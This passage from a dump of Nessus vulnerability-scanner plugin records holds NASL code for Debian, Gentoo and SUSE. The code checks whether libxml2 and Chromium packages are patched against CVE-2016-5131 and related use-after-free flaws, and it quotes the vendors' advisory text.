security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-4658 Namespace nodes must be copied to avoid use-after-free\nerrors. But they don't necessarily have a physical representation in a\ndocument, so simply disallow them in XPointer ranges.\n\nCVE-2016-5131 The old code would invoke the broken\nxmlXPtrRangeToFunction. range-to isn't really a function but a special\nkind of location step. Remove this function and always handle range-to\nin the XPath code. The old xmlXPtrRangeToFunction could also be abused\nto trigger a use-after-free error with the potential for remote code\nexecution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.8.0+dfsg1-7+wheezy7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/10/msg00048.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libxml2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2-utils-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:python-libxml2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libxml2\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-dev\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-doc\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxml2-utils-dbg\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"python-libxml2-dbg\", reference:\"2.8.0+dfsg1-7+wheezy7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:23:42", "description": "Several vulnerabilities were discovered in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause a denial-of-service against the application, or potentially, the execution of arbitrary code with the privileges of the user running the application.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "Debian DSA-3744-1 : libxml2 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libxml2", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3744.NASL", "href": "https://www.tenable.com/plugins/nessus/96101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3744. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96101);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n script_xref(name:\"DSA\", value:\"3744\");\n\n script_name(english:\"Debian DSA-3744-1 : libxml2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in libxml2, a library\nproviding support to read, modify and write XML and HTML files. A\nremote attacker could provide a specially crafted XML or HTML file\nthat, when processed by an application using libxml2, would cause a\ndenial-of-service against the application, or potentially, the\nexecution of arbitrary code with the privileges of the user running\nthe application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=840553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=840554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libxml2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3744\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libxml2 packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 2.9.1+dfsg1-5+deb8u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libxml2\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-dbg\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-dev\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-doc\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-utils\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libxml2-utils-dbg\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"python-libxml2\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"python-libxml2-dbg\", reference:\"2.9.1+dfsg1-5+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:07", "description": "The remote host is affected by the vulnerability described in GLSA-201610-09 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2016-10-31T00:00:00", "type": "nessus", "title": "GLSA-201610-09 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137", "CVE-2016-5138", "CVE-2016-5139", "CVE-2016-5140", "CVE-2016-5141", "CVE-2016-5142", "CVE-2016-5143", "CVE-2016-5144", "CVE-2016-5145", "CVE-2016-5146", "CVE-2016-5147", "CVE-2016-5148", "CVE-2016-5149", "CVE-2016-5150", "CVE-2016-5151", "CVE-2016-5152", "CVE-2016-5153", "CVE-2016-5154", "CVE-2016-5155", "CVE-2016-5156", "CVE-2016-5157", "CVE-2016-5158", "CVE-2016-5159", "CVE-2016-5160", "CVE-2016-5161", "CVE-2016-5162", "CVE-2016-5163", "CVE-2016-5164", "CVE-2016-5165", "CVE-2016-5166", "CVE-2016-5167", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5173", "CVE-2016-5174", "CVE-2016-5175", "CVE-2016-5177", "CVE-2016-5178", "CVE-2016-5181", "CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5184", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5189", "CVE-2016-5190", "CVE-2016-5191", "CVE-2016-5192", "CVE-2016-5193", "CVE-2016-5194"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201610-09.NASL", "href": "https://www.tenable.com/plugins/nessus/94420", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201610-09.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94420);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\", \"CVE-2016-5138\", \"CVE-2016-5139\", \"CVE-2016-5140\", \"CVE-2016-5141\", \"CVE-2016-5142\", \"CVE-2016-5143\", \"CVE-2016-5144\", \"CVE-2016-5145\", \"CVE-2016-5146\", \"CVE-2016-5147\", \"CVE-2016-5148\", \"CVE-2016-5149\", \"CVE-2016-5150\", \"CVE-2016-5151\", \"CVE-2016-5152\", \"CVE-2016-5153\", \"CVE-2016-5154\", \"CVE-2016-5155\", \"CVE-2016-5156\", \"CVE-2016-5157\", \"CVE-2016-5158\", \"CVE-2016-5159\", \"CVE-2016-5160\", \"CVE-2016-5161\", \"CVE-2016-5162\", \"CVE-2016-5163\", \"CVE-2016-5164\", \"CVE-2016-5165\", \"CVE-2016-5166\", \"CVE-2016-5167\", \"CVE-2016-5170\", \"CVE-2016-5171\", \"CVE-2016-5172\", \"CVE-2016-5173\", \"CVE-2016-5174\", \"CVE-2016-5175\", \"CVE-2016-5177\", \"CVE-2016-5178\", \"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\", \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\", \"CVE-2016-5193\", \"CVE-2016-5194\");\n script_xref(name:\"GLSA\", value:\"201610-09\");\n\n script_name(english:\"GLSA-201610-09 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201610-09\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201610-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-54.0.2840.59'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 54.0.2840.59\"), vulnerable:make_list(\"lt 54.0.2840.59\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:00", "description": "This update for libxml2 fixes one issue. This security issue was fixed :\n\n - CVE-2017-15412: Prevent use after free when calling XPath extension functions that allowed remote attackers to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2 allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-02-09T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2018:0401-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-15412", "CVE-2017-5130"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libxml2", "p-cpe:/a:novell:suse_linux:libxml2-2", "p-cpe:/a:novell:suse_linux:libxml2-2-debuginfo", "p-cpe:/a:novell:suse_linux:libxml2-debugsource", "p-cpe:/a:novell:suse_linux:libxml2-tools", "p-cpe:/a:novell:suse_linux:libxml2-tools-debuginfo", "p-cpe:/a:novell:suse_linux:python-libxml2", "p-cpe:/a:novell:suse_linux:python-libxml2-debuginfo", "p-cpe:/a:novell:suse_linux:python-libxml2-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-0401-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106708", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0401-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106708);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-5130\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libxml2 (SUSE-SU-2018:0401-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for libxml2 fixes one issue. This security issue was \nfixed :\n\n - CVE-2017-15412: Prevent use after free when calling\n XPath extension functions that allowed remote attackers\n to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow\n in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5130/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180401-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47defebc\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-276=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2018-276=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2018-276=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-276=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-276=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-276=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2018-276=1\n\nSUSE CaaS Platform ALL:zypper in -t patch SUSE-CAASP-ALL-2018-276=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2018-276=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"python-libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-debugsource-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-tools-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libxml2-tools-debuginfo-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"python-libxml2-2.9.4-46.12.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"python-libxml2-debuginfo-2.9.4-46.12.1\")) flag++;\nif 